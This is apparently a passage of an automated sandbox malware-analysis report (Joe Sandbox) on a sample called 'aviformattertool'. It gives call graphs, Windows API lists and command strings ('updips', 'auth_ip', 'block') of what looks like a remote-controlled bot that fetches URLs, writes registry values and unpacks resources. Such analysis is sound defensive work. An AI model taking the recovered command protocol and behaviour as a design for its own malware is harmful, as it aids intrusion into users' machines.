19853->19852 19865 2a18967 19853->19865 19859 2a123ab 19855->19859 19856 2a12417 19856->19845 19856->19846 19857 2a123c1 PostQueuedCompletionStatus 19858 2a123da RtlEnterCriticalSection 19857->19858 19857->19859 19858->19859 19859->19856 19859->19857 19860 2a123f8 InterlockedExchange RtlLeaveCriticalSection 19859->19860 19860->19859 19863 2a17db0 19861->19863 19862 2a132ee RtlLeaveCriticalSection 19862->18473 19863->19862 19881 2a11e7f 19863->19881 19866 2a18991 19865->19866 19867 2a17dab 68 API calls 19866->19867 19869 2a189d7 19867->19869 19868 2a189fe 19868->19852 19869->19868 19871 2a1a1f4 19869->19871 19872 2a1a20e 19871->19872 19873 2a1a1fe 19871->19873 19872->19868 19873->19872 19876 2a1fab2 19873->19876 19877 2a22453 std::exception::exception 59 API calls 19876->19877 19878 2a1faca 19877->19878 19879 2a244da __CxxThrowException@8 RaiseException 19878->19879 19880 2a1fadf 19879->19880 19882 2a20a90 Mailbox 68 API calls 19881->19882 19883 2a11e90 19882->19883 19883->19863 19885 2a2280b 19884->19885 19886 2a25ddb strtoxl 59 API calls 19885->19886 19889 2a2281b _strlen 19885->19889 19887 2a22810 19886->19887 19888 2a24e75 strtoxl 9 API calls 19887->19888 19888->19889 19889->18481 19891 2a1a692 GetProcessHeap HeapFree 19890->19891 19891->18495 19893 2a13770 19892->19893 19894 2a13755 InterlockedCompareExchange 19892->19894 19896 2a20a90 Mailbox 68 API calls 19893->19896 19894->19893 19895 2a13765 19894->19895 19897 2a132ab 78 API calls 19895->19897 19898 2a13779 19896->19898 19897->19893 19899 2a129ee 76 API calls 19898->19899 19900 2a1378e 19899->19900 19900->18500 19930 2a2362d 19901->19930 19903 2a1545a 19903->18510 19904 2a23886 19903->19904 19905 2a23892 __setmbcp 19904->19905 19906 2a238b0 19905->19906 19907 2a238c8 19905->19907 19909 2a238c0 __setmbcp 19905->19909 19908 2a25ddb strtoxl 59 API calls 19906->19908 20072 2a29772 19907->20072 19911 2a238b5 19908->19911 19909->18512 19913 2a24e75 strtoxl 9 API calls 19911->19913 19913->19909 19918 2a23a10 __setmbcp 19917->19918 19919 2a23a24 19918->19919 19920 2a23a3c 19918->19920 19921 2a25ddb strtoxl 59 API calls 19919->19921 19922 2a29772 __lock_file 60 API calls 19920->19922 19929 2a23a34 __setmbcp 19920->19929 19923 2a23a29 19921->19923 19924 2a23a4e 19922->19924 19925 2a24e75 strtoxl 9 API calls 19923->19925 20099 2a23998 19924->20099 19925->19929 19929->18510 19933 2a23639 __setmbcp 19930->19933 19931 2a2364b 19932 2a25ddb strtoxl 59 API calls 19931->19932 19934 2a23650 19932->19934 19933->19931 19935 2a23678 19933->19935 19936 2a24e75 strtoxl 9 API calls 19934->19936 19949 2a29848 19935->19949 19946 2a2365b @_EH4_CallFilterFunc@8 __setmbcp 19936->19946 19938 2a2367d 19939 2a23693 19938->19939 19940 2a23686 19938->19940 19941 2a236bc 19939->19941 19942 2a2369c 19939->19942 19943 2a25ddb strtoxl 59 API calls 19940->19943 19964 2a29967 19941->19964 19944 2a25ddb strtoxl 59 API calls 19942->19944 19943->19946 19944->19946 19946->19903 19950 2a29854 __setmbcp 19949->19950 19951 2a2886d __lock 59 API calls 19950->19951 19962 2a29862 19951->19962 19952 2a298d6 19994 2a2995e 19952->19994 19953 2a298dd 19954 2a28a34 __malloc_crt 59 API calls 19953->19954 19956 2a298e4 19954->19956 19956->19952 19958 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19956->19958 19957 2a29953 __setmbcp 19957->19938 19961 2a2990a RtlEnterCriticalSection 19958->19961 19959 2a288f5 __mtinitlocknum 59 API calls 19959->19962 19961->19952 19962->19952 19962->19953 19962->19959 19984 2a297b1 19962->19984 19989 2a2981b 19962->19989 19965 2a29984 19964->19965 19966 2a29998 19965->19966 19980 2a29b3f 19965->19980 19999 2a307ce 19965->19999 19967 2a25ddb strtoxl 59 API calls 19966->19967 19968 2a2999d 19967->19968 19969 2a24e75 strtoxl 9 API calls 19968->19969 19972 2a236c7 19969->19972 19970 2a29b9b 20005 2a307b0 19970->20005 19981 2a236e9 19972->19981 19977 2a308fd __openfile 59 API calls 19978 2a29b57 19977->19978 19979 2a308fd __openfile 59 API calls 19978->19979 19978->19980 19979->19980 19980->19966 19980->19970 20065 2a297e1 19981->20065 19983 2a236ef 19983->19946 19985 2a297d2 RtlEnterCriticalSection 19984->19985 19986 2a297bc 19984->19986 19985->19962 19987 2a2886d __lock 59 API calls 19986->19987 19988 2a297c5 19987->19988 19988->19962 19990 2a29829 19989->19990 19991 2a2983c RtlLeaveCriticalSection 19989->19991 19997 2a289d7 RtlLeaveCriticalSection 19990->19997 19991->19962 19993 2a29839 19993->19962 19998 2a289d7 RtlLeaveCriticalSection 19994->19998 19996 2a29965 19996->19957 19997->19993 19998->19996 20008 2a307e6 19999->20008 20001 2a29b05 20001->19966 20002 2a308fd 20001->20002 20016 2a30915 20002->20016 20004 2a29b38 20004->19977 20004->19980 20023 2a30699 20005->20023 20007 2a307c9 20007->19972 20009 2a307fb 20008->20009 20014 2a307f4 20008->20014 20010 2a221fb _LocaleUpdate::_LocaleUpdate 59 API calls 20009->20010 20011 2a30808 20010->20011 20012 2a25ddb strtoxl 59 API calls 20011->20012 20011->20014 20013 2a3083b 20012->20013 20015 2a24e75 strtoxl 9 API calls 20013->20015 20014->20001 20015->20014 20017 2a221fb _LocaleUpdate::_LocaleUpdate 59 API calls 20016->20017 20019 2a30928 20017->20019 20018 2a3093d 20018->20004 20019->20018 20020 2a25ddb strtoxl 59 API calls 20019->20020 20021 2a30969 20020->20021 20022 2a24e75 strtoxl 9 API calls 20021->20022 20022->20018 20025 2a306a5 __setmbcp 20023->20025 20024 2a306bb 20026 2a25ddb strtoxl 59 API calls 20024->20026 20025->20024 20027 2a306f1 20025->20027 20028 2a306c0 20026->20028 20034 2a30762 20027->20034 20030 2a24e75 strtoxl 9 API calls 20028->20030 20032 2a306ca __setmbcp 20030->20032 20032->20007 20043 2a281b6 20034->20043 20036 2a3070d 20039 2a30736 20036->20039 20037 2a30776 20037->20036 20038 2a22ef4 _free 59 API calls 20037->20038 20038->20036 20040 2a30760 20039->20040 20041 2a3073c 20039->20041 20040->20032 20064 2a30fad RtlLeaveCriticalSection 20041->20064 20044 2a281c3 20043->20044 20045 2a281d9 20043->20045 20046 2a25ddb strtoxl 59 API calls 20044->20046 20045->20044 20047 2a281e0 ___crtIsPackagedApp 20045->20047 20048 2a281c8 20046->20048 20050 2a281f6 MultiByteToWideChar 20047->20050 20051 2a281e9 AreFileApisANSI 20047->20051 20049 2a24e75 strtoxl 9 API calls 20048->20049 20063 2a281d2 20049->20063 20052 2a28210 GetLastError 20050->20052 20053 2a28221 20050->20053 20051->20050 20054 2a281f3 20051->20054 20055 2a25dba __dosmaperr 59 API calls 20052->20055 20056 2a28a34 __malloc_crt 59 API calls 20053->20056 20054->20050 20055->20063 20057 2a28229 20056->20057 20058 2a28230 MultiByteToWideChar 20057->20058 20057->20063 20059 2a28246 GetLastError 20058->20059 20058->20063 20060 2a25dba __dosmaperr 59 API calls 20059->20060 20061 2a28252 20060->20061 20062 2a22ef4 _free 59 API calls 20061->20062 20062->20063 20063->20037 20064->20040 20066 2a297f0 20065->20066 20067 2a2980f RtlLeaveCriticalSection 20065->20067 20066->20067 20068 2a297f7 20066->20068 20067->19983 20071 2a289d7 RtlLeaveCriticalSection 20068->20071 20070 2a2980c 20070->19983 20071->20070 20073 2a29782 20072->20073 20074 2a297a4 RtlEnterCriticalSection 20072->20074 20073->20074 20075 2a2978a 20073->20075 20076 2a238ce 20074->20076 20077 2a2886d __lock 59 API calls 20075->20077 20078 2a2372d 20076->20078 20077->20076 20081 2a2373c 20078->20081 20084 2a2375a 20078->20084 20079 2a2374a 20080 2a25ddb strtoxl 59 API calls 20079->20080 20082 2a2374f 20080->20082 20081->20079 20081->20084 20088 2a23774 _memmove 20081->20088 20083 2a24e75 strtoxl 9 API calls 20082->20083 20083->20084 20090 2a23900 20084->20090 20085 2a25e81 __flsbuf 79 API calls 20085->20088 20087 2a29db1 __fclose_nolock 59 API calls 20087->20088 20088->20084 20088->20085 20088->20087 20089 2a29dd5 __write 79 API calls 20088->20089 20093 2a2a76f 20088->20093 20089->20088 20091 2a297e1 __fsopen 2 API calls 20090->20091 20092 2a23906 20091->20092 20092->19909 20094 2a2a782 20093->20094 20098 2a2a7a6 20093->20098 20095 2a29db1 __fclose_nolock 59 API calls 20094->20095 20094->20098 20096 2a2a79f 20095->20096 20097 2a29dd5 __write 79 API calls 20096->20097 20097->20098 20098->20088 20100 2a239a7 20099->20100 20101 2a239bb 20099->20101 20102 2a25ddb strtoxl 59 API calls 20100->20102 20104 2a2a76f __flush 79 API calls 20101->20104 20107 2a239b7 20101->20107 20103 2a239ac 20102->20103 20105 2a24e75 strtoxl 9 API calls 20103->20105 20106 2a239c7 20104->20106 20105->20107 20118 2a2b21b 20106->20118 20115 2a23a73 20107->20115 20110 2a29db1 __fclose_nolock 59 API calls 20111 2a239d5 20110->20111 20122 2a2b0a6 20111->20122 20113 2a239db 20113->20107 20114 2a22ef4 _free 59 API calls 20113->20114 20114->20107 20116 2a297e1 __fsopen 2 API calls 20115->20116 20117 2a23a79 20116->20117 20117->19929 20119 2a239cf 20118->20119 20120 2a2b228 20118->20120 20119->20110 20120->20119 20121 2a22ef4 _free 59 API calls 20120->20121 20121->20119 20123 2a2b0b2 __setmbcp 20122->20123 20124 2a2b0d6 20123->20124 20125 2a2b0bf 20123->20125 20127 2a2b161 20124->20127 20129 2a2b0e6 20124->20129 20126 2a25da7 __commit 59 API calls 20125->20126 20128 2a2b0c4 20126->20128 20130 2a25da7 __commit 59 API calls 20127->20130 20131 2a25ddb strtoxl 59 API calls 20128->20131 20132 2a2b104 20129->20132 20133 2a2b10e 20129->20133 20134 2a2b109 20130->20134 20144 2a2b0cb __setmbcp 20131->20144 20136 2a25da7 __commit 59 API calls 20132->20136 20135 2a30c07 ___lock_fhandle 60 API calls 20133->20135 20138 2a25ddb strtoxl 59 API calls 20134->20138 20137 2a2b114 20135->20137 20136->20134 20140 2a2b132 20137->20140 20141 2a2b127 20137->20141 20139 2a2b16d 20138->20139 20142 2a24e75 strtoxl 9 API calls 20139->20142 20145 2a25ddb strtoxl 59 API calls 20140->20145 20148 2a2b181 20141->20148 20142->20144 20144->20113 20146 2a2b12d 20145->20146 20163 2a2b159 20146->20163 20149 2a30ec4 __commit 59 API calls 20148->20149 20152 2a2b18f 20149->20152 20150 2a2b1e5 20152->20150 20153 2a2b1c3 20152->20153 20156 2a30ec4 __commit 59 API calls 20152->20156 20153->20150 20175 2a30fad RtlLeaveCriticalSection 20163->20175 20176 402535 20179 2a23c8f 20176->20179 20180 2a23c98 20179->20180 20181 2a23c9d 20179->20181 20193 2a2b861 20180->20193 20185 2a23cb2 20181->20185 20184 40253f 20186 2a23cbe __setmbcp 20185->20186 20190 2a23d0c ___DllMainCRTStartup 20186->20190 20192 2a23d69 __setmbcp 20186->20192 20197 2a23b1d 20186->20197 20188 2a23d46 20189 2a23b1d __CRT_INIT@12 138 API calls 20188->20189 20188->20192 20189->20192 20190->20188 20191 2a23b1d __CRT_INIT@12 138 API calls 20190->20191 20190->20192 20191->20188 20192->20184 20194 2a2b891 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 20193->20194 20195 2a2b884 20193->20195 20196 2a2b888 20194->20196 20195->20194 20195->20196 20196->20181 20198 2a23b29 __setmbcp 20197->20198 20199 2a23b31 20198->20199 20200 2a23bab 20198->20200 20245 2a28166 GetProcessHeap 20199->20245 20202 2a23c14 20200->20202 20203 2a23baf 20200->20203 20205 2a23c77 20202->20205 20206 2a23c19 20202->20206 20208 2a23bd0 20203->20208 20239 2a23b3a __CRT_INIT@12 __setmbcp 20203->20239 20346 2a283db 20203->20346 20204 2a23b36 20204->20239 20246 2a25d14 20204->20246 20210 2a25ba4 __freeptd 59 API calls 20205->20210 20205->20239 20207 2a2914b __getptd_noexit TlsGetValue 20206->20207 20212 2a23c24 20207->20212 20349 2a282b2 RtlDecodePointer 20208->20349 20210->20239 20216 2a289ec __calloc_crt 59 API calls 20212->20216 20212->20239 20214 2a23b46 __RTC_Initialize 20222 2a23b56 GetCommandLineA 20214->20222 20214->20239 20218 2a23c35 20216->20218 20217 2a23be6 __CRT_INIT@12 20373 2a23bff 20217->20373 20223 2a2916a __getptd_noexit TlsSetValue 20218->20223 20218->20239 20219 2a2b4ff __ioterm 60 API calls 20221 2a23be1 20219->20221 20224 2a25d8a __mtterm 62 API calls 20221->20224 20267 2a2b8fd GetEnvironmentStringsW 20222->20267 20226 2a23c4d 20223->20226 20224->20217 20228 2a23c53 20226->20228 20229 2a23c6b 20226->20229 20231 2a25c61 __initptd 59 API calls 20228->20231 20232 2a22ef4 _free 59 API calls 20229->20232 20234 2a23c5b GetCurrentThreadId 20231->20234 20232->20239 20233 2a23b70 20235 2a23b74 20233->20235 20299 2a2b551 20233->20299 20234->20239 20332 2a25d8a 20235->20332 20239->20190 20240 2a23b94 20240->20239 20245->20204 20377 2a28482 RtlEncodePointer 20246->20377 20248 2a25d19 20382 2a2899e 20248->20382 20251 2a25d22 20252 2a25d8a __mtterm 62 API calls 20251->20252 20254 2a25d27 20252->20254 20254->20214 20256 2a25d3f 20257 2a289ec __calloc_crt 59 API calls 20256->20257 20258 2a25d4c 20257->20258 20259 2a25d81 20258->20259 20261 2a2916a __getptd_noexit TlsSetValue 20258->20261 20260 2a25d8a __mtterm 62 API calls 20259->20260 20262 2a25d86 20260->20262 20263 2a25d60 20261->20263 20262->20214 20263->20259 20264 2a25d66 20263->20264 20265 2a25c61 __initptd 59 API calls 20264->20265 20266 2a25d6e GetCurrentThreadId 20265->20266 20266->20214 20268 2a2b910 WideCharToMultiByte 20267->20268 20269 2a23b66 20267->20269 20271 2a2b943 20268->20271 20272 2a2b97a FreeEnvironmentStringsW 20268->20272 20280 2a2b24b 20269->20280 20273 2a28a34 __malloc_crt 59 API calls 20271->20273 20272->20269 20274 2a2b949 20273->20274 20274->20272 20275 2a2b950 WideCharToMultiByte 20274->20275 20276 2a2b966 20275->20276 20277 2a2b96f FreeEnvironmentStringsW 20275->20277 20278 2a22ef4 _free 59 API calls 20276->20278 20277->20269 20279 2a2b96c 20278->20279 20279->20277 20281 2a2b257 __setmbcp 20280->20281 20282 2a2886d __lock 59 API calls 20281->20282 20283 2a2b25e 20282->20283 20284 2a289ec __calloc_crt 59 API calls 20283->20284 20286 2a2b26f 20284->20286 20285 2a2b2da GetStartupInfoW 20289 2a2b41e 20285->20289 20291 2a2b2ef 20285->20291 20286->20285 20287 2a2b27a @_EH4_CallFilterFunc@8 __setmbcp 20286->20287 20287->20233 20288 2a2b4e6 20390 2a2b4f6 20288->20390 20289->20288 20293 2a2b46b GetStdHandle 20289->20293 20294 2a2b47e GetFileType 20289->20294 20298 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 20289->20298 20291->20289 20292 2a289ec __calloc_crt 59 API calls 20291->20292 20296 2a2b33d 20291->20296 20292->20291 20293->20289 20294->20289 20295 2a2b371 GetFileType 20295->20296 20296->20289 20296->20295 20297 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 20296->20297 20297->20296 20298->20289 20300 2a2b564 GetModuleFileNameA 20299->20300 20301 2a2b55f 20299->20301 20303 2a2b591 20300->20303 20400 2a2520a 20301->20400 20394 2a2b604 20303->20394 20305 2a23b80 20305->20240 20310 2a2b780 20305->20310 20307 2a28a34 __malloc_crt 59 API calls 20308 2a2b5ca 20307->20308 20308->20305 20333 2a25d94 20332->20333 20335 2a25d9a 20332->20335 20526 2a2912c 20333->20526 20336 2a288d3 20335->20336 20337 2a288b7 RtlDeleteCriticalSection 20335->20337 20339 2a288df RtlDeleteCriticalSection 20336->20339 20340 2a288f2 20336->20340 20338 2a22ef4 _free 59 API calls 20337->20338 20338->20335 20339->20336 20340->20239 20347 2a28524 _doexit 59 API calls 20346->20347 20348 2a283e6 20347->20348 20348->20208 20350 2a282de 20349->20350 20351 2a282cc 20349->20351 20352 2a22ef4 _free 59 API calls 20350->20352 20351->20350 20353 2a22ef4 _free 59 API calls 20351->20353 20354 2a282eb 20352->20354 20353->20351 20355 2a2830f 20354->20355 20357 2a22ef4 _free 59 API calls 20354->20357 20356 2a22ef4 _free 59 API calls 20355->20356 20358 2a2831b 20356->20358 20357->20354 20359 2a22ef4 _free 59 API calls 20358->20359 20360 2a2832c 20359->20360 20361 2a22ef4 _free 59 API calls 20360->20361 20362 2a28337 20361->20362 20363 2a2835c RtlEncodePointer 20362->20363 20366 2a22ef4 _free 59 API calls 20362->20366 20364 2a28371 20363->20364 20365 2a28377 20363->20365 20367 2a22ef4 _free 59 API calls 20364->20367 20368 2a2838d 20365->20368 20370 2a22ef4 _free 59 API calls 20365->20370 20369 2a2835b 20366->20369 20367->20365 20371 2a22ef4 _free 59 API calls 20368->20371 20372 2a23bd5 20368->20372 20369->20363 20370->20368 20371->20372 20372->20217 20372->20219 20374 2a23c03 20373->20374 20375 2a23c11 20373->20375 20374->20375 20376 2a25d8a __mtterm 62 API calls 20374->20376 20375->20239 20376->20375 20378 2a28493 __init_pointers __initp_misc_winsig 20377->20378 20389 2a23987 RtlEncodePointer 20378->20389 20380 2a284ab __init_pointers 20381 2a291fa 34 API calls 20380->20381 20381->20248 20383 2a289aa 20382->20383 20384 2a25d1e 20383->20384 20385 2a2918c ___lock_fhandle InitializeCriticalSectionAndSpinCount 20383->20385 20384->20251 20386 2a2910e 20384->20386 20385->20383 20387 2a29125 TlsAlloc 20386->20387 20388 2a25d34 20386->20388 20388->20251 20388->20256 20389->20380 20393 2a289d7 RtlLeaveCriticalSection 20390->20393 20392 2a2b4fd 20392->20287 20393->20392 20395 2a2b626 20394->20395 20399 2a2b68a 20395->20399 20404 2a31556 20395->20404 20397 2a2b5a7 20397->20305 20397->20307 20398 2a31556 _parse_cmdline 59 API calls 20398->20399 20399->20397 20399->20398 20401 2a25213 20400->20401 20402 2a2521a 20400->20402 20410 2a25567 20401->20410 20402->20300 20407 2a314fc 20404->20407 20408 2a221fb _LocaleUpdate::_LocaleUpdate 59 API calls 20407->20408 20409 2a3150e 20408->20409 20409->20395 20411 2a25573 __setmbcp 20410->20411 20412 2a25bda __setmbcp 59 API calls 20411->20412 20413 2a2557b 20412->20413 20414 2a254c1 __setmbcp 59 API calls 20413->20414 20527 2a29143 TlsFree 20526->20527 20528 2a2913f 20526->20528 20527->20335 20528->20335 20529 2a4ed73 CreateFileA 20530 2aa3592 20529->20530 20531 40b139 CreateThread 20532 4022cb 20531->20532 20533 40227d 20532->20533 20534 4024f9 LoadLibraryExA 20535 402299 Sleep 20536 40b20b 20535->20536 20537 2a164dc RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 20614 2a142c7 20537->20614 20615 40277e 20618 401f64 FindResourceA 20615->20618 20617 402783 20619 401f86 GetLastError SizeofResource 20618->20619 20625 401f9f 20618->20625 20620 401fa6 LoadResource LockResource GlobalAlloc 20619->20620 20619->20625 20621 401fd2 20620->20621 20622 401ffb GetTickCount 20621->20622 20623 402005 GlobalAlloc 20622->20623 20623->20625 20625->20617 20626 2a81776 20627 2aac075 FindCloseChangeNotification 20626->20627 20628 40b1be 20629 40b43e RegSetValueExA RegCloseKey 20628->20629 20630 40bb92 SetEvent 20629->20630 20631 2a4f75a 20632 2a4f762 SHGetSpecialFolderPathA 20631->20632 20634 2a5357b 20632->20634

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 02A172FC Relevance: 74.2, APIs: 29, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 0 2a172fc-2a17314 InternetOpenA 1 2a173da-2a173e0 0->1 2 2a1731a-2a17391 InternetSetOptionA * 3 call 2a24a70 InternetOpenUrlA 0->2 3 2a173e2-2a173e8 1->3 4 2a173fc-2a1740a 1->4 11 2a173d3-2a173d4 InternetCloseHandle 2->11 12 2a17393 2->12 7 2a173ea-2a173ec 3->7 8 2a173ee-2a173fb call 2a1547e 3->8 9 2a17410-2a17434 call 2a24a70 call 2a1442e 4->9 10 2a16745-2a16747 4->10 7->4 8->4 9->10 31 2a1743a-2a17468 RtlEnterCriticalSection RtlLeaveCriticalSection call 2a222bc 9->31 13 2a16750-2a16752 10->13 14 2a16749-2a1674e 10->14 11->1 17 2a17397-2a173bd InternetReadFile 12->17 19 2a16754 13->19 20 2a1675f-2a16793 RtlEnterCriticalSection RtlLeaveCriticalSection 13->20 18 2a16759 Sleep 14->18 24 2a173c8-2a173cf InternetCloseHandle 17->24 25 2a173bf-2a173c6 17->25 18->20 19->18 26 2a167e3 20->26 27 2a16795-2a167a1 20->27 24->11 25->17 29 2a167e7 26->29 27->26 30 2a167a3-2a167b0 27->30 29->0 32 2a167b2-2a167b6 30->32 33 2a167b8-2a167b9 30->33 38 2a1746a-2a1747c call 2a222bc 31->38 39 2a174be-2a174d9 call 2a222bc 31->39 35 2a167bd-2a167e1 call 2a24a70 * 2 32->35 33->35 35->29 38->39 49 2a1747e-2a17490 call 2a222bc 38->49 47 2a17793-2a177a5 call 2a222bc 39->47 48 2a174df-2a174e1 39->48 56 2a177a7-2a177a9 47->56 57 2a177ee-2a17800 call 2a222bc 47->57 48->47 51 2a174e7-2a17599 call 2a22f2c RtlEnterCriticalSection RtlLeaveCriticalSection call 2a24a70 * 5 call 2a1442e * 2 48->51 49->39 59 2a17492-2a174a4 call 2a222bc 49->59 114 2a175d6 51->114 115 2a1759b-2a1759d 51->115 56->57 60 2a177ab-2a177e9 call 2a24a70 RtlEnterCriticalSection RtlLeaveCriticalSection 56->60 70 2a17821-2a17833 call 2a222bc 57->70 71 2a17802-2a1781c call 2a16246 call 2a16354 call 2a1645f 57->71 59->39 72 2a174a6-2a174b8 call 2a222bc 59->72 60->10 82 2a17b51-2a17b63 call 2a222bc 70->82 83 2a17839-2a1783b 70->83 71->10 72->10 72->39 82->10 95 2a17b69-2a17b97 call 2a22f2c call 2a24a70 call 2a1442e 82->95 83->82 87 2a17841-2a17858 call 2a1442e 83->87 87->10 99 2a1785e-2a1792c call 2a22398 call 2a11ba7 87->99 121 2a17ba0-2a17ba7 call 2a22ef4 95->121 122 2a17b99-2a17b9b call 2a153df 95->122 112 2a17933-2a17954 RtlEnterCriticalSection 99->112 113 2a1792e call 2a1143f 99->113 118 2a17960-2a179c4 RtlLeaveCriticalSection call 2a13c67 call 2a13d7e call 2a182bb 112->118 119 2a17956-2a1795d 112->119 113->112 123 2a175da-2a17608 call 2a22f2c call 2a24a70 call 2a1442e 114->123 115->114 120 2a1759f-2a175b1 call 2a222bc 115->120 146 2a17b38-2a17b4c call 2a18f83 118->146 147 2a179ca-2a17a12 call 2a1a6a5 118->147 119->118 120->114 135 2a175b3-2a175d4 call 2a1442e 120->135 121->10 122->121 144 2a17649-2a17652 call 2a22ef4 123->144 145 2a1760a-2a17619 call 2a23566 123->145 135->123 156 2a17789-2a1778c 144->156 157 2a17658-2a17670 call 2a23acc 144->157 145->144 158 2a1761b 145->158 146->10 159 2a17b02-2a17b33 call 2a1836a call 2a133b2 147->159 160 2a17a18-2a17a1f 147->160 156->47 170 2a17672-2a1767a call 2a196b7 157->170 171 2a1767c 157->171 163 2a17620-2a17632 call 2a227d0 158->163 159->146 161 2a17a22-2a17a27 160->161 161->161 165 2a17a29-2a17a74 call 2a1a6a5 161->165 177 2a17634 163->177 178 2a17637-2a17647 call 2a23566 163->178 165->159 179 2a17a7a-2a17a80 165->179 176 2a1767e-2a17736 call 2a1a7cf call 2a13863 call 2a151ab call 2a13863 call 2a1aa75 call 2a1ab8f 170->176 171->176 202 2a17738 call 2a1380b 176->202 203 2a1773d-2a17768 Sleep call 2a21870 176->203 177->178 178->144 178->163 183 2a17a83-2a17a88 179->183 183->183 186 2a17a8a-2a17ac5 call 2a1a6a5 183->186 186->159 193 2a17ac7-2a17b01 call 2a1d097 186->193 193->159 202->203 207 2a17774-2a17782 203->207 208 2a1776a-2a17773 call 2a14100 203->208 207->156 209 2a17784 call 2a1380b 207->209 208->207 209->156
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNELBASE(0000EA60), ref: 02A16759
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
                                                                                                                                                          • InternetOpenA.WININET(?), ref: 02A17306
                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02A1732E
                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02A17346
                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02A1735E
                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02A17387
                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02A173A9
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A173C9
                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A173D4
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A1743F
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A17450
                                                                                                                                                          • _malloc.LIBCMT ref: 02A174E9
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A174FB
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A17507
                                                                                                                                                          • _malloc.LIBCMT ref: 02A175DF
                                                                                                                                                          • _strtok.LIBCMT ref: 02A17610
                                                                                                                                                          • _swscanf.LIBCMT ref: 02A17627
                                                                                                                                                          • _strtok.LIBCMT ref: 02A1763E
                                                                                                                                                          • _free.LIBCMT ref: 02A1764A
                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02A17742
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A177C3
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A177D5
                                                                                                                                                          • _sprintf.LIBCMT ref: 02A17873
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000020), ref: 02A17937
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A1796B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                                                                                          • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                                                                          • API String ID: 1657546717-1839899575
                                                                                                                                                          • Opcode ID: 80a09a594984f16e10b26e53c22d65574ae502aebac19f052a45b4e7a3914d80
                                                                                                                                                          • Instruction ID: d2ec68e8df26bf4fc36a686c13cc69d826579fcbd0aeb594873a26ff47db0aa3
                                                                                                                                                          • Opcode Fuzzy Hash: 80a09a594984f16e10b26e53c22d65574ae502aebac19f052a45b4e7a3914d80
                                                                                                                                                          • Instruction Fuzzy Hash: 11320231588381AFE735AF24DD45BAFBBE6AF86320F10081DF58997291EF719409CB52
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A164DC Relevance: 70.2, APIs: 34, Strings: 6, Instructions: 228memorysleeplibraryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 213 2a164dc-2a16742 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2a142c7 GetTickCount call 2a160d8 GetVersionExA call 2a24a70 call 2a22f2c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2a24a70 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2a22f2c * 4 QueryPerformanceCounter Sleep call 2a22f2c * 2 call 2a24a70 * 2 258 2a16745-2a16747 213->258 259 2a16750-2a16752 258->259 260 2a16749-2a1674e 258->260 262 2a16754 259->262 263 2a1675f-2a16793 RtlEnterCriticalSection RtlLeaveCriticalSection 259->263 261 2a16759 Sleep 260->261 261->263 262->261 264 2a167e3 263->264 265 2a16795-2a167a1 263->265 266 2a167e7-2a17314 InternetOpenA 264->266 265->264 267 2a167a3-2a167b0 265->267 272 2a173da-2a173e0 266->272 273 2a1731a-2a17391 InternetSetOptionA * 3 call 2a24a70 InternetOpenUrlA 266->273 268 2a167b2-2a167b6 267->268 269 2a167b8-2a167b9 267->269 271 2a167bd-2a167e1 call 2a24a70 * 2 268->271 269->271 271->266 274 2a173e2-2a173e8 272->274 275 2a173fc-2a1740a 272->275 283 2a173d3-2a173d4 InternetCloseHandle 273->283 284 2a17393 273->284 279 2a173ea-2a173ec 274->279 280 2a173ee-2a173fb call 2a1547e 274->280 275->258 282 